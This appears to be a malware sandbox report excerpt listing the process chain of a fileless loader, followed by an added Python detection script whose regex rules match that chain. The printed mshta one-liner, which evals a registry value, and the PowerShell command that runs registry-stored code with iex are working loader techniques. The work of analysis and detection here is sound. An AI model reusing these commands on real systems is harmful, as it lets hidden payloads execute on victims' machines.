                    Source: unknown | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Wfdc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wfdc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                    Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline'
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDDD0.tmp' 'c:\Users\user\AppData\Local\Temp\tjafqng0\CSC6B09D7CB2D7045B59F7434F2A8CE445.TMP'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.cmdline'
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESEAC0.tmp' 'c:\Users\user\AppData\Local\Temp\qlsida3o\CSCC809748AA5EB4643A41D26B71B98A016.TMP'
                    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
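                    The process list above is the whole staging chain in one place: WmiPrvSE.exe launching rundll32 on a file with a `.cpp` extension through `DllRegisterServer`, mshta.exe running an inline `about:<hta:application>` that `regread`s the `DeviceFile` value under `HKCU\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550`, PowerShell `iex`ing the `UtilTool` value from the same key, and csc.exe compiling from `%TEMP%`. The `StdRegProv::SetBinaryValue` / `SetStringValue` calls earlier in this section are the likely origin of those values, although the report does not show the target key of the WMI writes. The block below is an added example for this report, not sandbox output: rule logic over constructed Sysmon-style process-creation and registry events built from the command lines above. The parent of mshta.exe (not shown in the report), the user SID, the two benign control events and the rule names are assumptions.

```python
"""
Detection logic for the staging chain in this report, run over constructed
Sysmon-style events. Added example, not sandbox output: command lines are
taken from the process list; parents the report does not show, the SID,
the benign control events and the rule names are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str
    cmdline: str
    parent_image: str


@dataclass
class RegEvent:
    image: str       # process that performed the write
    target: str      # full path of the value written
    data_type: str   # REG_BINARY, REG_SZ, REG_DWORD


SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
LOLBINS = SHELLS | {"rundll32.exe", "mshta.exe", "wscript.exe", "cscript.exe", "regsvr32.exe"}

# The staging key HKCU\Software\AppDataLow\Software\Microsoft\<GUID>, tolerating the
# PowerShell drive form ("HKCU:"), JScript-escaped doubled backslashes and HKU\<SID>.
APPDATALOW_GUID = re.compile(
    r"(?:HKCU|HKEY_CURRENT_USER|HKU\\+S-1-5-21-[0-9-]+):?\\*Software\\+AppDataLow\\+"
    r"Software\\+Microsoft\\+[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}", re.I)
IEX = re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I)
REG_READ = re.compile(r"\b(?:gp|Get-ItemProperty|Get-ItemPropertyValue|regread)\b", re.I)
RUNDLL = re.compile(r'rundll32(?:\.exe)?"?\s+"?(?P<module>[^",]+?)"?\s*,\s*(?P<export>\w+)', re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate_process(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event matches, in a fixed order."""
    hits = []
    img, parent, cmd = basename(ev.image), basename(ev.parent_image), ev.cmdline
    if img == "mshta.exe" and "<hta:application>" in cmd.lower() and re.search(r"regread|eval\(", cmd, re.I):
        hits.append("mshta_inline_hta_reads_registry")
    if parent == "mshta.exe" and img in SHELLS:
        hits.append("mshta_spawns_shell")
    if img in SHELLS and IEX.search(cmd) and REG_READ.search(cmd):
        hits.append("powershell_iex_from_registry")
    if APPDATALOW_GUID.search(cmd):
        hits.append("appdatalow_guid_key_referenced")
    m = RUNDLL.search(cmd) if img == "rundll32.exe" else None
    if m and not m.group("module").lower().endswith((".dll", ".cpl")):
        hits.append("rundll32_non_dll_module")   # fum.cpp is a DLL under a misleading extension
    if parent == "wmiprvse.exe" and img in LOLBINS:
        hits.append("wmiprvse_spawns_lolbin")     # process started through WMI, not by the script host
    if parent in SHELLS and img == "csc.exe" and "\\appdata\\local\\temp\\" in cmd.lower():
        hits.append("powershell_compiles_csharp_in_temp")
    return hits


def evaluate_registry(ev: RegEvent) -> list[str]:
    hits = []
    if APPDATALOW_GUID.search(ev.target):
        hits.append("appdatalow_guid_value_written")
        if ev.data_type == "REG_BINARY":
            hits.append("binary_payload_staged_by_" + basename(ev.image).removesuffix(".exe"))
    return hits


SAMPLE_PROCS = [  # command lines from the report; parents marked where assumed
    ProcEvent(r"C:\Windows\System32\rundll32.exe",
              r"rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer",
              r"C:\Windows\System32\wbem\WmiPrvSE.exe"),
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Wfdc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wfdc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'",
              r"C:\Windows\explorer.exe"),   # parent not shown in the report; assumed
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))",
              r"C:\Windows\System32\mshta.exe"),
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r"'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline'",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe",   # constructed benign control
              r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
              r"C:\Windows\explorer.exe"),
]
SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"   # constructed
SAMPLE_REGS = [
    RegEvent(r"C:\Windows\SysWOW64\rundll32.exe",
             "HKU\\" + SID + r"\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\UtilTool",
             "REG_BINARY"),
    RegEvent(r"C:\Windows\explorer.exe",              # constructed benign control
             "HKU\\" + SID + r"\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
             "REG_DWORD"),
]

if __name__ == "__main__":
    for ev in SAMPLE_PROCS:
        print(basename(ev.image), evaluate_process(ev))
    for ev in SAMPLE_REGS:
        print(ev.target, evaluate_registry(ev))
```

Two of the rules carry most of the weight on this sample and generalise beyond it: `rundll32_non_dll_module` (a `DllRegisterServer` call on a module whose extension is neither `.dll` nor `.cpl`) and `appdatalow_guid_key_referenced`, which fires on the mshta and PowerShell command lines alike because the regex accepts the `HKCU:` drive form, the doubled JScript backslashes and the `HKU\<SID>` form that registry telemetry records. The registry rule tags the writing process by name so that a binary value staged by rundll32 or WmiPrvSE stands out from the same key being touched by a browser or installer.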
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe<